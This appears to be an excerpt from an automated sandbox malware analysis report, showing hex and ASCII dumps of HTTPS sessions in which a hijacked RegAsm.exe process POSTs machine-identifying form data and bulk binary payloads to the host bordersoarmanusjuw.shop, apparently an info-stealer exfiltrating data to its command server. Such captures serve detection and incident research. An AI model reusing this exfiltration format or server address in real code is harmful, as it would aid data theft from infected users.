                                                                                                                                            2024-04-21 13:31:42 UTC545INData Raw: 33 39 65 63 0d 0a 4e 48 6f 49 33 44 65 71 54 39 63 32 32 57 63 38 4c 59 75 35 63 73 73 38 75 2b 79 36 7a 55 32 4c 47 51 68 48 72 53 4d 77 6e 73 42 50 63 41 48 2b 51 59 68 31 39 77 4c 31 62 54 55 50 2b 4e 78 51 38 52 7a 50 6e 73 2b 6f 59 59 45 51 4b 69 62 4a 41 51 71 2b 70 6c 55 57 65 37 6b 62 6f 45 62 31 57 36 46 46 42 67 33 51 73 33 75 77 4e 72 4c 6c 6d 4b 67 6a 71 53 4d 6f 5a 64 70 47 55 76 75 34 51 42 39 6d 72 31 37 46 49 5a 64 62 76 42 4e 64 51 4f 72 4b 47 65 56 56 31 4d 36 57 78 30 53 43 4f 32 30 39 6a 78 6b 51 76 49 31 52 44 6d 6d 52 56 74 6b 6b 39 52 72 54 62 6a 55 50 37 73 31 51 38 52 79 5a 73 4a 69 39 4c 50 6c 34 5a 54 54 78 41 51 72 6c 6e 42 59 54 66 4c 6c 46 79 7a 75 2b 57 62 63 55 59 41 2b 78 6a 30 4c 37 44 49 76 63 78 2b 39 48 67 6d 51 43 54
                                                                                                                                            Data Ascii: 39ecNHoI3DeqT9c22Wc8LYu5css8u+y6zU2LGQhHrSMwnsBPcAH+QYh19wL1bTUP+NxQ8RzPns+oYYEQKibJAQq+plUWe7kboEb1W6FFBg3Qs3uwNrLlmKgjqSMoZdpGUvu4QB9mr17FIZdbvBNdQOrKGeVV1M6Wx0SCO209jxkQvI1RDmmRVtkk9RrTbjUP7s1Q8RyZsJi9LPl4ZTTxAQrlnBYTfLlFyzu+WbcUYA+xj0L7DIvcx+9HgmQCT
                                                                                                                                            2024-04-21 13:31:42 UTC1369INData Raw: 77 78 44 43 6e 45 77 45 38 70 79 6f 35 76 4b 56 61 57 44 4c 38 46 63 34 6a 74 46 6d 37 46 31 5a 45 34 74 34 43 6f 6c 66 55 67 39 69 69 4a 65 5a 34 61 69 4c 46 53 31 33 32 70 6c 73 56 62 4c 35 56 69 47 50 64 50 39 42 46 57 56 65 70 67 31 4c 70 66 64 79 65 33 36 4d 35 71 30 45 71 54 61 52 65 48 4a 66 67 46 48 41 42 70 7a 32 6a 52 76 56 54 74 30 55 47 44 61 6e 54 46 61 70 64 30 6f 48 62 70 79 54 37 65 33 67 6a 77 6b 52 41 2b 71 64 59 45 6d 6d 73 58 38 59 72 74 6c 32 77 44 46 74 49 37 5a 74 65 77 54 57 79 7a 74 2b 33 62 37 45 35 4b 67 54 43 53 6c 37 32 74 56 5a 59 41 74 56 4b 68 6b 58 65 54 64 4e 75 4e 51 2f 75 31 31 44 78 48 4a 6d 4b 32 61 73 75 37 58 56 6b 49 63 4e 48 58 50 47 74 55 42 4a 71 75 56 2f 41 4a 62 52 5a 73 41 70 65 53 75 54 66 46 71 56 66 33 4d
                                                                                                                                            Data Ascii: wxDCnEwE8pyo5vKVaWDL8Fc4jtFm7F1ZE4t4ColfUg9iiJeZ4aiLFS132plsVbL5ViGPdP9BFWVepg1Lpfdye36M5q0EqTaReHJfgFHABpz2jRvVTt0UGDanTFapd0oHbpyT7e3gjwkRA+qdYEmmsX8Yrtl2wDFtI7ZtewTWyzt+3b7E5KgTCSl72tVZYAtVKhkXeTdNuNQ/u11DxHJmK2asu7XVkIcNHXPGtUBJquV/AJbRZsApeSuTfFqVf3M
                                                                                                                                            2024-04-21 13:31:42 UTC1369INData Raw: 71 53 4d 6f 5a 63 78 4e 58 2f 57 6e 57 51 70 67 73 6c 54 61 4b 72 78 64 73 51 52 51 51 4f 4c 58 46 62 74 56 31 6f 62 58 72 69 4c 6b 63 47 34 6c 6a 77 38 36 6c 38 6b 57 48 33 4c 2b 44 59 70 74 6c 46 6d 30 46 31 31 65 71 2b 34 54 70 31 44 65 6d 4a 6a 48 52 50 59 31 41 6b 37 57 4b 54 6d 58 34 6c 45 55 4b 75 59 58 69 43 79 35 57 4c 6f 4b 57 45 58 68 32 42 47 37 56 39 61 47 31 36 59 75 36 6e 39 72 4c 39 31 54 55 76 43 77 57 68 4a 73 73 56 6a 45 62 66 73 38 30 47 34 65 53 50 47 62 53 4f 73 65 38 34 33 4d 72 43 57 72 54 6d 6b 72 77 55 5a 45 76 4d 6f 39 42 79 54 57 50 74 46 46 33 6a 2f 37 41 6c 49 50 73 5a 6c 51 70 46 2f 52 69 4d 71 67 49 75 70 31 5a 43 72 4b 54 6c 72 38 6f 6c 73 64 62 72 56 65 79 79 43 78 52 72 45 46 56 6b 72 6f 30 52 72 70 45 4c 48 6c 73 2b 38
                                                                                                                                            Data Ascii: qSMoZcxNX/WnWQpgslTaKrxdsQRQQOLXFbtV1obXriLkcG4ljw86l8kWH3L+DYptlFm0F11eq+4Tp1DemJjHRPY1Ak7WKTmX4lEUKuYXiCy5WLoKWEXh2BG7V9aG16Yu6n9rL91TUvCwWhJssVjEbfs80G4eSPGbSOse843MrCWrTmkrwUZEvMo9ByTWPtFF3j/7AlIPsZlQpF/RiMqgIup1ZCrKTlr8olsdbrVeyyCxRrEFVkro0RrpELHls+8
                                                                                                                                            2024-04-21 13:31:42 UTC1369INData Raw: 69 6e 46 51 56 66 75 71 6c 41 66 5a 72 5a 51 78 79 75 77 57 62 77 4f 58 56 33 37 32 42 53 6e 55 70 6e 41 73 4d 52 45 71 58 78 79 5a 5a 63 44 45 74 6d 31 56 51 68 73 76 52 57 67 52 71 6f 61 30 32 35 48 4a 34 4b 77 55 4b 35 53 6d 64 61 61 37 79 2f 6e 64 32 45 69 78 45 70 57 2b 4b 4a 62 45 32 53 77 58 4d 51 6c 75 56 4f 70 43 46 74 48 34 39 49 56 70 56 50 61 6e 4e 75 75 62 36 63 54 41 55 36 50 52 6b 71 38 2b 68 52 59 54 59 31 69 36 32 33 64 50 36 52 4c 4e 69 54 77 73 33 76 43 48 74 36 43 6d 50 64 74 71 58 70 69 49 73 46 46 51 50 4b 77 57 42 39 71 75 46 33 41 4b 72 6c 61 74 52 64 57 54 75 6e 56 48 36 46 58 33 59 2f 63 71 79 50 75 4f 79 52 4e 70 43 6f 53 2b 37 6f 57 51 43 6a 2b 66 63 73 33 72 78 61 56 44 6c 35 49 2b 63 30 4c 36 54 61 79 6b 5a 62 48 52 50 41 54
                                                                                                                                            Data Ascii: inFQVfuqlAfZrZQxyuwWbwOXV372BSnUpnAsMREqXxyZZcDEtm1VQhsvRWgRqoa025HJ4KwUK5Smdaa7y/nd2EixEpW+KJbE2SwXMQluVOpCFtH49IVpVPanNuub6cTAU6PRkq8+hRYTY1i623dP6RLNiTws3vCHt6CmPdtqXpiIsFFQPKwWB9quF3AKrlatRdWTunVH6FX3Y/cqyPuOyRNpCoS+7oWQCj+fcs3rxaVDl5I+c0L6TaykZbHRPAT
                                                                                                                                            2024-04-21 13:31:42 UTC1369INData Raw: 4a 41 2b 36 4a 53 45 32 57 79 57 38 51 6d 76 6c 2b 34 44 31 64 4d 35 64 30 52 70 31 37 58 6a 70 6a 68 52 34 49 51 4b 69 4c 58 41 51 71 2b 34 6e 59 54 66 4b 74 57 32 43 75 79 57 50 74 74 4e 56 43 6e 73 33 75 77 4e 72 4c 6c 6d 4b 67 6a 71 53 4d 6f 5a 63 46 54 56 76 32 69 58 68 46 6d 74 56 33 61 4b 72 4a 66 74 51 74 56 53 2b 58 53 47 36 42 62 31 59 2f 54 70 69 72 74 63 57 77 6f 6a 77 38 36 6c 38 6b 57 48 33 4c 2b 44 59 70 74 6d 56 65 30 44 68 34 6e 67 73 52 65 77 54 58 41 35 72 50 45 62 2b 35 33 4b 6e 32 4e 41 56 58 30 71 6c 67 62 62 4c 56 5a 78 43 79 38 55 72 34 4e 57 55 44 75 30 68 65 70 57 4d 75 4a 31 61 59 76 34 6e 4a 67 49 63 35 4b 45 72 4c 4b 50 58 4d 71 75 55 32 49 64 66 63 55 69 51 4a 49 58 2b 71 62 65 4d 4a 42 6c 2b 57 77 78 44 61 42 45 41 46 6c 79
                                                                                                                                            Data Ascii: JA+6JSE2WyW8Qmvl+4D1dM5d0Rp17XjpjhR4IQKiLXAQq+4nYTfKtW2CuyWPttNVCns3uwNrLlmKgjqSMoZcFTVv2iXhFmtV3aKrJftQtVS+XSG6Bb1Y/TpirtcWwojw86l8kWH3L+DYptmVe0Dh4ngsRewTXA5rPEb+53Kn2NAVX0qlgbbLVZxCy8Ur4NWUDu0hepWMuJ1aYv4nJgIc5KErLKPXMquU2IdfcUiQJIX+qbeMJBl+WwxDaBEAFly
                                                                                                                                            2024-04-21 13:31:42 UTC1369INData Raw: 37 50 6e 4d 42 2f 6c 4c 45 62 65 30 57 2b 77 52 53 51 4f 72 55 45 36 70 66 30 35 7a 4b 6f 79 62 68 66 6d 59 75 77 55 64 41 2b 71 31 66 47 32 6d 33 55 73 41 68 76 31 65 38 52 52 41 6e 67 72 42 51 72 6b 61 5a 31 70 72 76 44 50 35 72 5a 32 57 6e 4b 6b 32 79 79 6a 30 42 41 74 55 2b 69 43 71 35 46 4f 4e 48 48 6b 66 6b 30 78 71 74 57 64 53 4a 33 71 59 39 34 48 35 6b 4a 63 74 4b 58 66 71 6d 56 52 68 34 75 46 48 41 4c 72 68 5a 74 51 5a 61 44 36 65 7a 65 38 49 65 33 70 61 59 39 32 32 70 53 57 63 72 31 45 35 56 37 61 67 57 63 41 47 68 47 36 42 47 72 44 7a 51 62 68 35 49 35 5a 74 49 36 78 37 64 67 4d 71 6b 4c 75 4a 77 5a 43 4c 41 52 46 6a 38 72 56 49 62 5a 4c 56 55 79 79 57 34 57 62 55 50 56 30 62 75 31 78 53 75 48 70 66 6d 73 38 52 76 37 6d 4d 71 66 59 30 42 65 64
                                                                                                                                            Data Ascii: 7PnMB/lLEbe0W+wRSQOrUE6pf05zKoybhfmYuwUdA+q1fG2m3UsAhv1e8RRAngrBQrkaZ1prvDP5rZ2WnKk2yyj0BAtU+iCq5FONHHkfk0xqtWdSJ3qY94H5kJctKXfqmVRh4uFHALrhZtQZaD6eze8Ie3paY922pSWcr1E5V7agWcAGhG6BGrDzQbh5I5ZtI6x7dgMqkLuJwZCLARFj8rVIbZLVUyyW4WbUPV0bu1xSuHpfms8Rv7mMqfY0Bed
                                                                                                                                            2024-04-21 13:31:42 UTC1369INData Raw: 4d 76 77 56 36 7a 71 6a 58 72 77 4a 53 45 54 6f 32 41 61 6b 54 70 6e 6d 73 37 42 68 67 52 42 7a 54 61 51 71 45 76 75 75 46 6b 41 6f 2f 6c 50 42 4b 37 4a 53 74 52 64 62 53 65 62 55 47 61 42 61 30 59 33 59 71 79 76 75 66 6d 6b 70 78 45 5a 52 38 36 5a 66 46 6d 4f 78 46 59 5a 46 33 6a 2f 37 41 6b 59 50 73 5a 6c 51 69 45 58 61 67 74 58 76 52 34 4a 6b 4a 45 32 6b 57 44 71 58 79 52 59 66 5a 76 34 4e 69 6d 32 35 57 72 34 46 56 45 6e 74 33 68 61 6a 57 39 6d 46 32 36 41 72 37 33 39 6c 4a 63 52 49 55 2f 71 6e 58 42 4e 73 73 31 62 4f 4b 2f 55 61 30 32 34 31 44 2b 37 44 55 50 45 63 6d 61 37 44 6f 69 50 75 4f 77 4a 4f 30 41 38 36 6c 37 73 2b 63 77 48 2b 55 73 52 74 37 52 62 37 44 6c 4a 4c 37 74 73 64 71 6c 62 63 69 74 4b 71 4c 2b 46 70 59 69 58 49 55 30 44 38 71 31 4d
                                                                                                                                            Data Ascii: MvwV6zqjXrwJSETo2AakTpnms7BhgRBzTaQqEvuuFkAo/lPBK7JStRdbSebUGaBa0Y3YqyvufmkpxEZR86ZfFmOxFYZF3j/7AkYPsZlQiEXagtXvR4JkJE2kWDqXyRYfZv4Nim25Wr4FVEnt3hajW9mF26Ar739lJcRIU/qnXBNss1bOK/Ua0241D+7DUPEcma7DoiPuOwJO0A86l7s+cwH+UsRt7Rb7DlJL7tsdqlbcitKqL+FpYiXIU0D8q1M
                                                                                                                                            2024-04-21 13:31:42 UTC1369INData Raw: 6f 68 6c 39 54 7a 51 62 6d 45 42 67 62 42 37 36 55 61 5a 31 70 72 76 47 75 70 31 5a 43 4c 5a 55 42 2f 62 72 46 45 5a 66 4b 35 43 78 32 33 37 50 4e 42 75 48 6b 6d 70 67 31 4c 36 45 4c 48 6c 73 2b 38 72 2b 44 73 79 5a 35 38 54 43 61 6e 78 41 55 67 34 31 6a 37 58 59 39 30 2f 6f 6d 30 31 4a 4b 6e 4e 55 50 45 63 69 38 43 77 78 45 53 70 61 53 70 39 6a 51 45 56 2f 37 42 45 48 6d 6d 6f 56 6f 38 54 69 33 4f 74 44 31 6c 66 37 73 77 66 36 52 43 78 35 62 50 76 49 4b 6b 6a 4b 42 79 6e 4b 6a 6d 58 34 6c 38 66 63 61 39 44 78 54 32 79 46 4e 4e 75 4e 58 43 6e 73 33 76 43 48 73 48 4f 67 4f 31 76 33 48 68 6b 4b 38 68 58 51 37 47 46 51 42 4a 74 72 6c 4c 66 49 76 55 61 30 32 34 31 44 2b 2b 62 53 4f 73 4e 6c 2b 61 7a 78 47 2f 74 61 69 70 39 6a 52 45 41 70 2f 63 46 54 7a 72 73
                                                                                                                                            Data Ascii: ohl9TzQbmEBgbB76UaZ1prvGup1ZCLZUB/brFEZfK5Cx237PNBuHkmpg1L6ELHls+8r+DsyZ58TCanxAUg41j7XY90/om01JKnNUPEci8CwxESpaSp9jQEV/7BEHmmoVo8Ti3OtD1lf7swf6RCx5bPvIKkjKBynKjmX4l8fca9DxT2yFNNuNXCns3vCHsHOgO1v3HhkK8hXQ7GFQBJtrlLfIvUa0241D++bSOsNl+azxG/taip9jREAp/cFTzrs
                                                                                                                                            2024-04-21 13:31:42 UTC1369INData Raw: 6c 56 76 45 55 51 4a 34 4b 77 55 4b 59 65 67 63 7a 68 37 79 7a 37 61 53 55 30 32 55 78 43 2b 2b 35 65 43 57 65 79 46 59 5a 76 39 52 69 2f 44 6c 4a 4b 37 73 74 66 75 30 37 53 67 73 37 6a 4b 2f 73 37 4a 47 65 50 55 46 6e 7a 73 46 67 66 4a 61 39 44 78 54 32 32 55 62 78 4a 56 6c 37 6b 31 31 44 6e 48 4a 6d 62 30 36 4d 70 35 47 34 6c 4e 4e 6c 43 52 50 76 75 58 67 6c 6e 73 68 58 33 59 39 30 2f 30 45 56 47 44 37 47 5a 55 4a 78 64 31 34 44 66 75 54 36 6b 57 32 45 70 7a 45 31 54 2b 2b 49 59 63 41 48 56 46 63 35 74 37 52 62 6f 53 7a 59 6b 67 70 73 55 75 42 36 42 7a 49 6a 39 64 4c 77 6f 50 58 57 64 4b 54 6e 6a 37 44 35 7a 63 39 59 2b 6f 32 32 6a 46 4f 4e 48 44 41 47 42 73 48 76 70 54 4a 6e 57 6d 75 39 6f 36 6d 6c 34 49 38 78 58 55 62 75 63 61 42 6c 6e 73 52 6e 47 4a
                                                                                                                                            Data Ascii: lVvEUQJ4KwUKYegczh7yz7aSU02UxC++5eCWeyFYZv9Ri/DlJK7stfu07Sgs7jK/s7JGePUFnzsFgfJa9DxT22UbxJVl7k11DnHJmb06Mp5G4lNNlCRPvuXglnshX3Y90/0EVGD7GZUJxd14DfuT6kW2EpzE1T++IYcAHVFc5t7RboSzYkgpsUuB6BzIj9dLwoPXWdKTnj7D5zc9Y+o22jFONHDAGBsHvpTJnWmu9o6ml4I8xXUbucaBlnsRnGJ


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            36192.168.2.449776172.67.189.664435948C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:42 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 18158
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:42 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:42 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                                                                                                            Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                                                                                            2024-04-21 13:31:43 UTC812INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:43 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=n13v8g9ndi3mvuo267si0shvmv; expires=Thu, 15-Aug-2024 07:18:22 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0EfaUD4%2F%2Bz9w4qP5GcjsVcn3HK6HimPKzOr1PtmeMPLLpc4ElCnDRgAGKNIrWNu0sGlELMJY8af1br1Chca%2FakLUYjeM9kKkTzCMz38nXAw3s4jfgPyJ9i77cMlEfq8dL9NqVPP0Wyj6KA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc69fca4673e-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            37192.168.2.449777172.67.189.664435948C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:43 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8779
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:43 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:44 UTC816INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:44 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=8h0br9iavo0vaa6mm9coq212ra; expires=Thu, 15-Aug-2024 07:18:23 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5UmpRbYgCQ%2Bt%2B0uMPtYpDZcB1l6q6yYBPIGk3r%2B3Ufn4lv%2FobKugxEAxjg8W7Vm9pInsfUcT%2FrmqoFKWgHnqYv1FnJy4uJZEUllvEWxiKsOohT5TQnq7auck2JnUBXEEzeZPZHpeawYUIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc6ed9dcad76-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            38192.168.2.449778172.67.189.664435948C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:44 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20432
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:44 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:44 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                            2024-04-21 13:31:44 UTC814INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:44 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=v82t6fmg2b8s29jdn942lopfah; expires=Thu, 15-Aug-2024 07:18:23 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rdNnIzccPmtu6nAzNj7LQ5QSeUS%2FlG14m9yJm8ECR8Bazzc%2BVu1thAalWI17%2BWy8ju5EyvblhZ8lG4hScR1eNwHCdZQJuFrecYcDsGFuRajsiZMuP3yhrmSKs6JBwAo1EBlKXr5v5MnH%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc73bf3db0cd-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
